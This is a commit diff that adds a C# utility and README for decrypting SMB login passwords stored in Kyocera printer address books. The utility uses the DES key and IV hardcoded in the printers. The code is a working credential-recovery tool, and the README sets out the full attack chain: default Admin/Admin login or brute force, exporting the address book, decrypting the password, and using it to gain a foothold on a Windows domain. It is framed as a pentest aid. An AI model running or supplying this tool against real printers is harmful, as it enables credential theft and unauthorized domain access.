alienwithin
diff --git a/‎kyocera/KyoceraAddressBookDecryptor.cs
Lines changed: 59 additions & 0 deletions b/‎kyocera/KyoceraAddressBookDecryptor.cs
Lines changed: 59 additions & 0 deletions
diff --git a/‎kyocera/KyoceraAddressBookDecryptor.exe
6 KB b/‎kyocera/KyoceraAddressBookDecryptor.exe
6 KB
diff --git a/‎kyocera/Readme.md
Lines changed: 45 additions & 0 deletions b/‎kyocera/Readme.md
Lines changed: 45 additions & 0 deletions
diff --git a/‎kyocera/printer_xml_address_book.PNG
31 KB b/‎kyocera/printer_xml_address_book.PNG
31 KB
diff --git a/‎kyocera/usage_sample.PNG
18.5 KB b/‎kyocera/usage_sample.PNG
18.5 KB
@@ -0,0 +1,59 @@
+/*
+Exploiting printers to gain foothold on a domain.
+Kyocera Comes with a pre-bundled Key and IV
+This utility seeks to create a threat model around the weak encryption and misconfiguration of features for abuse 
+Tested via: 
+- Kyocera ECOSYS M2640idw
+- Kyocera 4550i
+It obeys : RFC2898
+Author: Alien-within
+*/
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Security;
+using System.Security.Cryptography;
+using System.Text;
+using System.IO;
+using System.Linq;
+
+public class Alienwithin
+{
+    public static void Main(string[] args)
+    {
+        System.Console.WriteLine("#################################################");
+        System.Console.WriteLine("      Kyocera AddressBook SMB Password Decryptor ");
+        System.Console.WriteLine("                   By Alien-Within               ");
+        System.Console.WriteLine("#################################################");
+        Console.WriteLine("Enter the value of SmbLoginPasswd field : ");
+        string KyoceraSMBPass = Console.ReadLine();
+        try
+        {
+            DESCryptoServiceProvider AlienwithinDESProvider = new DESCryptoServiceProvider();
+            AlienwithinDESProvider.Mode = CipherMode.CBC;
+            AlienwithinDESProvider.Padding = PaddingMode.None;
+            var key = new byte[] { 0x41, 0xF4, 0xA3, 0x05, 0xF3, 0x8B, 0x46, 0x8F };
+            var iv  = new byte[] { 0x01, 0x82, 0x0D, 0x0B, 0x38, 0x3E, 0xCB, 0x7C };
+            var data  = StringToByteArray(KyoceraSMBPass.Trim());
+            
+            MemoryStream AlienwithinMemoryStream = new MemoryStream();
+            
+            CryptoStream CStream = new CryptoStream(AlienwithinMemoryStream, AlienwithinDESProvider.CreateDecryptor(key, iv), CryptoStreamMode.Write);
+            CStream.Write(data, 0, data.Length);
+            CStream.FlushFinalBlock();
+            Console.WriteLine(Encoding.Default.GetString(AlienwithinMemoryStream.ToArray()));
+            
+         }
+        catch (Exception ex)
+        {
+            Console.WriteLine(ex.ToString());
+        }
+    }
+    public static byte[] StringToByteArray(string hex) {
+    return Enumerable.Range(0, hex.Length)
+                     .Where(x => x % 2 == 0)
+                     .Select(x => Convert.ToByte(hex.Substring(x, 2), 16))
+                     .ToArray();
+    }
+}
@@ -0,0 +1,45 @@
+### Exploiting Printers (Kyocera)
+This script would assisst in a pentest scenario to abuse a printer feature found in Kyocera printers to gain access to windows credentials. 
+Kyocera Printers contain an address book feature; within this feature an administrator can use one of two methods to transmit scanned documents: 
+- Configure a send to e-mail
+- Configure a windows account to login to the host 
+
+Tested on: 
+- Kyocera ECOSYS M2640idw
+- Kyocera 4550i
+
+## Setup 
+Quite simple really you can compile with the **csc.exe** utility in your dotnet framework. 
+- Navigate 
+`<path/to/csc.exe> KyoceraAddressBookDecryptor.cs`
+
+an example is below: 
+`C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe KyoceraAddressBookDecryptor.cs`
+
+You also need to download KNetViewer to be able to export the addressbook from the printer. 
+Pre-compiled binary for the decryptor provided just incase you're pressed for time. :-P
+
+## usage
+- Navigate to the path where you have saved this exe
+- run `KyoceraAddressBookDecryptor.exe` 
+- paste the encrypted value from the SmbLoginPasswd field in the Address Book XML. 
+
+A sample of the address book is below: 
+
+
+The decryption process is as easy as below:
+
+
+###Presumed Flow
+                    
+```seq
+Pentester->KNetViewer: Login 
+Note left of KNetViewer: Login could be by:\n default (Admin/Admin);\nor Bruteforce
+Printer-->Pentester: Export Address Book
+Pentester-->Decryptor: Run Decryptor and \npass encrypted Password
+Decryptor->Pentester: Get Plaintext Password
+Pentester->>Domain: Gain Foothold or Administration\n\n
+Note right of Domain: Privilege Gained Depends on \nrights of the configured user!
+```
+
+###End